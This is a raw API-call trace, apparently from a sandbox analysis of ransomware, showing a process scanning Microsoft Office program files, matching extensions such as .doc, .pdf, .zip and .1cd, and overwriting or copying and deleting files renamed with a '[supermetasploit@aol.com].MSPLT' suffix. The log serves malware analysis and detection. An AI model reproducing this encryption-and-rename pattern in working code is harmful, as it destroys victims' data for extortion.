[0175.023] lstrlenW (lpString=".jpg") returned 4 [0175.023] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0175.024] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0175.024] lstrlenW (lpString="AppXManifest.xml") returned 16 [0175.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0175.024] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=5944055) returned 1 [0175.024] CloseHandle (hObject=0x354) returned 1 [0175.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml")) returned 0x20 [0175.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.024] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0175.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0175.025] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc64 | out: lpNewFilePointer=0x0) returned 1 [0175.025] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc24 | out: lpNewFilePointer=0x0) returned 1 [0175.025] ReadFile (in: hFile=0x354, lpBuffer=0x30d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c2fc30, lpOverlapped=0x0 | out: lpBuffer=0x30d1058*, lpNumberOfBytesRead=0x2c2fc30*=0x40000, lpOverlapped=0x0) returned 1 [0175.029] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x1e3ba7, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc24 | out: lpNewFilePointer=0x0) returned 1 [0175.029] ReadFile (in: hFile=0x354, lpBuffer=0x3111058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c2fc30, lpOverlapped=0x0 | out: lpBuffer=0x3111058*, lpNumberOfBytesRead=0x2c2fc30*=0x40000, lpOverlapped=0x0) returned 1 [0175.051] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2c2fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.051] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x56b2f7, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc24 | out: lpNewFilePointer=0x0) returned 1 [0175.051] ReadFile (in: hFile=0x354, lpBuffer=0x3151058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c2fc30, lpOverlapped=0x0 | out: lpBuffer=0x3151058*, lpNumberOfBytesRead=0x2c2fc30*=0x40000, lpOverlapped=0x0) returned 1 [0175.068] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.068] WriteFile (in: hFile=0x354, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x2c2fca8, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fca8*=0xc010c, lpOverlapped=0x0) returned 1 [0175.496] SetEndOfFile (hFile=0x354) returned 1 [0175.496] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3fb82b0 [0175.496] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc74 | out: lpNewFilePointer=0x0) returned 1 [0175.496] WriteFile (in: hFile=0x354, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c2fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x2c2fc80*=0x40000, lpOverlapped=0x0) returned 1 [0175.498] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x1e3ba7, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc74 | out: lpNewFilePointer=0x0) returned 1 [0175.498] WriteFile (in: hFile=0x354, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c2fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x2c2fc80*=0x40000, lpOverlapped=0x0) returned 1 [0175.505] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x56b2f7, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fc74 | out: lpNewFilePointer=0x0) returned 1 [0175.505] WriteFile (in: hFile=0x354, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c2fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x2c2fc80*=0x40000, lpOverlapped=0x0) returned 1 [0175.508] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3fb82b0 | out: hHeap=0x710000) returned 1 [0175.905] CloseHandle (hObject=0x354) returned 1 [0181.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0181.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.562] lstrlenW (lpString=".doc") returned 4 [0181.562] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.562] lstrlenW (lpString=".docx") returned 5 [0181.562] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0181.562] lstrlenW (lpString=".pdf") returned 4 [0181.562] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.562] lstrlenW (lpString=".xls") returned 4 [0181.562] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.562] lstrlenW (lpString=".xlsx") returned 5 [0181.562] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0181.562] lstrlenW (lpString=".ppt") returned 4 [0181.562] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.562] lstrlenW (lpString=".zip") returned 4 [0181.563] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.563] lstrlenW (lpString=".rar") returned 4 [0181.563] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString=".bz2") returned 4 [0181.563] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString=".7z") returned 3 [0181.563] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.563] lstrlenW (lpString=".dbf") returned 4 [0181.563] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.563] lstrlenW (lpString=".1cd") returned 4 [0181.563] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.563] lstrlenW (lpString=".jpg") returned 4 [0181.563] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.563] lstrlenW (lpString=".doc") returned 4 [0181.563] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString=".docx") returned 5 [0181.563] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0181.563] lstrlenW (lpString=".pdf") returned 4 [0181.563] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString=".xls") returned 4 [0181.563] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString=".xlsx") returned 5 [0181.563] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0181.563] lstrlenW (lpString=".ppt") returned 4 [0181.563] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.563] lstrlenW (lpString=".zip") returned 4 [0181.563] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.564] lstrlenW (lpString=".rar") returned 4 [0181.564] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.564] lstrlenW (lpString=".bz2") returned 4 [0181.564] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.564] lstrlenW (lpString=".7z") returned 3 [0181.564] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.564] lstrlenW (lpString=".dbf") returned 4 [0181.564] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.564] lstrlenW (lpString=".1cd") returned 4 [0181.564] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0181.564] lstrlenW (lpString=".jpg") returned 4 [0181.564] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.564] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.564] lstrlenW (lpString="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 53 [0181.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.646] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=343329) returned 1 [0181.646] CloseHandle (hObject=0x350) returned 1 [0181.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 0x220 [0181.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0181.711] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.711] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.712] GetLastError () returned 0x0 [0181.712] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x53d21, lpOverlapped=0x0) returned 1 [0181.801] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x53d30, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x53d30, lpOverlapped=0x0) returned 1 [0181.808] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.808] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0181.808] SetEndOfFile (hFile=0x374) returned 1 [0181.808] CloseHandle (hObject=0x374) returned 1 [0181.817] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.817] SetEndOfFile (hFile=0x354) returned 1 [0181.821] CloseHandle (hObject=0x354) returned 1 [0181.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0181.821] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 1 [0181.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.822] lstrlenW (lpString=".doc") returned 4 [0181.822] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.822] lstrlenW (lpString=".docx") returned 5 [0181.822] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.822] lstrlenW (lpString=".pdf") returned 4 [0181.822] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.822] lstrlenW (lpString=".xls") returned 4 [0181.822] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.822] lstrlenW (lpString=".xlsx") returned 5 [0181.822] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.822] lstrlenW (lpString=".ppt") returned 4 [0181.822] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.822] lstrlenW (lpString=".zip") returned 4 [0181.822] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.822] lstrlenW (lpString=".rar") returned 4 [0181.822] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.822] lstrlenW (lpString=".bz2") returned 4 [0181.822] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.822] lstrlenW (lpString=".7z") returned 3 [0181.822] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.822] lstrlenW (lpString=".dbf") returned 4 [0181.823] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.823] lstrlenW (lpString=".1cd") returned 4 [0181.823] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.823] lstrlenW (lpString=".jpg") returned 4 [0181.823] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.823] lstrlenW (lpString=".doc") returned 4 [0181.823] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString=".docx") returned 5 [0181.823] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.823] lstrlenW (lpString=".pdf") returned 4 [0181.823] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString=".xls") returned 4 [0181.823] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString=".xlsx") returned 5 [0181.823] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.823] lstrlenW (lpString=".ppt") returned 4 [0181.823] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.823] lstrlenW (lpString=".zip") returned 4 [0181.823] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.823] lstrlenW (lpString=".rar") returned 4 [0181.823] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString=".bz2") returned 4 [0181.823] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString=".7z") returned 3 [0181.823] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.823] lstrlenW (lpString=".dbf") returned 4 [0181.823] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.824] lstrlenW (lpString=".1cd") returned 4 [0181.824] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0181.824] lstrlenW (lpString=".jpg") returned 4 [0181.824] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.824] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.824] lstrlenW (lpString="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 53 [0181.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0181.824] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=1261) returned 1 [0181.825] CloseHandle (hObject=0x354) returned 1 [0181.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 0x220 [0181.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0181.825] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.825] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.825] GetLastError () returned 0x0 [0182.832] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0182.874] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0182.876] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.876] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.876] SetEndOfFile (hFile=0x374) returned 1 [0182.876] CloseHandle (hObject=0x374) returned 1 [0182.880] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.880] SetEndOfFile (hFile=0x354) returned 1 [0182.881] CloseHandle (hObject=0x354) returned 1 [0182.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.882] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 1 [0182.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.883] lstrlenW (lpString=".doc") returned 4 [0182.883] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.883] lstrlenW (lpString=".docx") returned 5 [0182.883] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.883] lstrlenW (lpString=".pdf") returned 4 [0182.883] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.883] lstrlenW (lpString=".xls") returned 4 [0182.883] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.883] lstrlenW (lpString=".xlsx") returned 5 [0182.883] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.883] lstrlenW (lpString=".ppt") returned 4 [0182.883] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.883] lstrlenW (lpString=".zip") returned 4 [0182.883] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.883] lstrlenW (lpString=".rar") returned 4 [0182.883] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.883] lstrlenW (lpString=".bz2") returned 4 [0182.883] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.883] lstrlenW (lpString=".7z") returned 3 [0182.883] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.883] lstrlenW (lpString=".dbf") returned 4 [0182.883] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.884] lstrlenW (lpString=".1cd") returned 4 [0182.884] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.884] lstrlenW (lpString=".jpg") returned 4 [0182.884] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.884] lstrlenW (lpString=".doc") returned 4 [0182.884] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 